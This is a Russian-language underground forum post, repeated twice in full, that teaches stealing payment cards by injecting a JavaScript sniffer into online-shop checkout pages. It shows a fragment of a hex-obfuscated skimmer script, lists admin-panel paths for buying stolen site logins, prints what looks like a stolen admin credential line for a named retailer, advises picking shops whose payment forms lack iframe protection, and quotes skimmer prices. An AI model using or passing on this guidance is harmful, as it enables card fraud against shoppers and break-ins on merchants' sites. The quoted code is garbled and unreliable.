Professor
Professional
- Messages
- 213
- Reaction score
- 22
- Points
- 18
Сниффер (sniffer) для добычи сс - скрипт, который внедряется в код сайта, анализирует трафик и передает все введенные данные клиентом в панель (crm).
Покупаем сниффер или просим кодера написать его на заказ и получаем скрипт. Пример:
...xa3f=["\x3F\x8E\x63\x68\x61\x8E\x67\x65","\x67\x65\x74x1\x74\x74\x72\x69\x62\x75\x74\x65","\x6A\x6C\x6B\x6F\x54\x6B\x68\6\x65\x65\x28\x74\x68\x69\x73\x29"\x73\x65\x74\x41\x74\x74\x72\x6\x6\x75\x74\x65","\x73\x65\x61\x72\x63\x68","\x6A\6C\x6B\x6F\x54\x6B\x68\x76\x65\x65\x28\x7468\x69\x73\x29\x3B","\x66\x6F\x72\x45\x61\x63\x8","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6\x6\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x6\x72\x6F\x6D","\x3\x65\C\x65\x63\x74","\x74\x65\x78\x74\x61\x7\x65\x61","\x75\x72\x6C\x3A\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x70\x75\x73\x68","\x74\x79\x70\x65\x3A\x32","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","\x69\x......
(в скрипт внес изменения и обрезал его)
и получаем доступ в панель. Панель ставится в сеть онион, войдя по лог/пасу вы будете видеть названия ваших сайтов и карты, полученные с них.
Далее, нам нужен сайт, в который мы сможем внедрить наш скрипт.
Строки можно купить у логоводов по запросу:
admin/index
index.php/admin
index/key/
wp-admin
wp-login
magento
Либо есть люди, которые работают с уязвимостями и взламывают/добывают вход в админ панель сайта.
Так выглядит нужная нам строка: tup8sr_jhsr:3RnOPYmlsf67phP5DhqNpmhkjbjhv93V49OZWr3MjLtGu:https://www.tupperware.fr/shop/admi...38d9c7cahfyfx85k5f167331209732145702efca5d65/
Перед покупкой сайта или перед тем, как отдать доступ кодеру для внедрения скрипта в него, нам нужно перейти на сам сайт (ссылка всегда есть в строке) и проверить, чтобы у сайта была внутренняя форма оплаты.
Нам подходят сайты исключительно с внутренней формой оплаты, не на страйпе и без iframe (защита).
Пример подходящей формы оплаты (она находится прям на сайте, без редиректа):
Лучше всего рассматривать сайты хотя бы от 50 ордеров в месяц. Страна подойдет любая, потому что скупают весь материал.
Стоимость сниффера на заказ (самопис) - от 4000$
Стоимость аренды (месяц) - от 500$
Стоимость аренды (навсегда) - от 1500$
Я не рекомендую арендовать сниффер у левых продавцов, так как велик шанс того, что ваш материал будут перехватывать.
Покупаем сниффер или просим кодера написать его на заказ и получаем скрипт. Пример:
...xa3f=["\x3F\x8E\x63\x68\x61\x8E\x67\x65","\x67\x65\x74x1\x74\x74\x72\x69\x62\x75\x74\x65","\x6A\x6C\x6B\x6F\x54\x6B\x68\6\x65\x65\x28\x74\x68\x69\x73\x29"\x73\x65\x74\x41\x74\x74\x72\x6\x6\x75\x74\x65","\x73\x65\x61\x72\x63\x68","\x6A\6C\x6B\x6F\x54\x6B\x68\x76\x65\x65\x28\x7468\x69\x73\x29\x3B","\x66\x6F\x72\x45\x61\x63\x8","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6\x6\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x6\x72\x6F\x6D","\x3\x65\C\x65\x63\x74","\x74\x65\x78\x74\x61\x7\x65\x61","\x75\x72\x6C\x3A\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x70\x75\x73\x68","\x74\x79\x70\x65\x3A\x32","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","\x69\x......
(в скрипт внес изменения и обрезал его)
и получаем доступ в панель. Панель ставится в сеть онион, войдя по лог/пасу вы будете видеть названия ваших сайтов и карты, полученные с них.
Далее, нам нужен сайт, в который мы сможем внедрить наш скрипт.
Строки можно купить у логоводов по запросу:
admin/index
index.php/admin
index/key/
wp-admin
wp-login
magento
Либо есть люди, которые работают с уязвимостями и взламывают/добывают вход в админ панель сайта.
Так выглядит нужная нам строка: tup8sr_jhsr:3RnOPYmlsf67phP5DhqNpmhkjbjhv93V49OZWr3MjLtGu:https://www.tupperware.fr/shop/admi...38d9c7cahfyfx85k5f167331209732145702efca5d65/
Перед покупкой сайта или перед тем, как отдать доступ кодеру для внедрения скрипта в него, нам нужно перейти на сам сайт (ссылка всегда есть в строке) и проверить, чтобы у сайта была внутренняя форма оплаты.
Нам подходят сайты исключительно с внутренней формой оплаты, не на страйпе и без iframe (защита).
Пример подходящей формы оплаты (она находится прям на сайте, без редиректа):
Лучше всего рассматривать сайты хотя бы от 50 ордеров в месяц. Страна подойдет любая, потому что скупают весь материал.
Стоимость сниффера на заказ (самопис) - от 4000$
Стоимость аренды (месяц) - от 500$
Стоимость аренды (навсегда) - от 1500$
Я не рекомендую арендовать сниффер у левых продавцов, так как велик шанс того, что ваш материал будут перехватывать.
